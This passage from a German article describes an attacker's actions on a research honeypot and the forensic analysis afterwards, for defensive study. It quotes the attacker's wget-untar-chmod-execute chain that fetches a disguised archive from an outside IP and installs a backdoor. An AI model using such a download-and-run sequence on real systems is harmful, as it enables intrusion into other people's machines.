Finale mit Hindernissen

Kurzzeitig sammelt der Angreifer Paypal-Benutzernamen und -Passwörter über eine Phishingseite ein (21.49 Uhr). Warum er sie nur kurzfristig aufsetzt, ist nicht nachvollziehbar. Der Einbrecher startet von dem übernommenen Honeypot aus weitere Angriffe im lokalen Netzwerk und in das Internet. Snort-Inline filtert Angriffe, für die bereits eine Signatur existiert. Der hier beschriebene Angreifer verwendet jedoch das reguläre HTTP-Protokoll, um weitere Rechner zu attackieren. Das ist schlecht zu verhindern, denn ein gesperrtes HTTP an der Honeywall hätte zur Folge, dass der Angreifer seine Werkzeuge nicht herunterladen kann. Auch ausgehende SSH-Verbindungen blockiert die Honeywall nicht, um dem Angreifer zu ermöglichen, auf den Honeypot zuzugreifen.

Allerdings unterbinden die Firewallregeln mit Hilfe eines Rate-Limits ausgehende Denial-of-Service-Angriffe. In der Standardkonfiguration erlaubt die Honeywall nur 15 ausgehende TCP- und 20 UDP-Verbindungen pro Tag. Somit schlägt der Versuch des Angreifers fehl, von dem gekaperten Honeypot aus den Server eines Webhosters in die Knie zu zwingen (2. Tag, 13.30 Uhr). Nachdem der Angreifer das festgestellt hat, scheint er einen Fehler in seiner UDP-Software zu vermuten, denn er lädt sie von einer anderen Quelle erneut herunter.

Um weitere Maschinen zu übernehmen, startet er auf ihnen die Kommandos »wget 208.25.xxx.xxx:443/bind.jpg«, »tar xzvf bind.jpg«, »chmod a+x httpd« und »./httpd« (3. Tag, 0.00 Uhr). Sie zielen auf die Installation einer mit den Rechten des Webservers laufenden Hintertür. In weniger als zwei Minuten hat der Angreifer sechs Rechner im Internet auf diese Weise übernommen. An dieser Stelle schalten die Autoren den Honeypot ab, um Schaden zu verhindern, und informieren alle betroffenen Administratoren.

Spuren analysieren

Für die Analyse nimmt der Admin die Honeypot-Rechner vom Netz und bindet deren kompromittierte Festplatten auf einem anderen Rechner ein. Dieser Schritt legt die Rootkits lahm, da die Systemprogramme der eingebundenen Festplatte nicht zum Einsatz kommen. Einige Vorsichtsmaßnahmen erhöhen noch den Wert der Analyse. Die von der Honeywall aufgezeichneten Logdaten, von wo der Angreifer welche Software auf das System lädt, sind nicht unbedingt vertrauenswürdig. Der Administrator sollte darum auch auf dem Honeypot selbst danach suchen. Außerdem versteckt sich zwar die Überwachungssoftware auf dem Honeypot vor dem Angreifer, aber falls er zum Beispiel den Netzwerkverkehr verschlüsselt, gehen Informationen verloren. Darum ist es nötig, die Aktivitäten des Angreifers zu verfolgen, um Gegenmaßnahmen zeitnah einzuleiten.

Auf dem kompromittierten Honeypot lassen sich Veränderungen am Dateisystem feststellen. Forensische Methoden [13] erlauben gelöschte Logdateien und Schadprogramme wiederherzustellen. Man erkennt damit, wie ein Angreifer seine Anwesenheit auf dem Rechner und die Veränderungen am Dateisystem zu verbergen sucht. Im beschriebenen Fall förderten die aufgespürten Logdateien des Schwachstellen-Scanners für Webanwendungen schließlich auch alle IP-Adressen zu Tage, die der Angreifer von dem Honeypot aus anvisiert hat.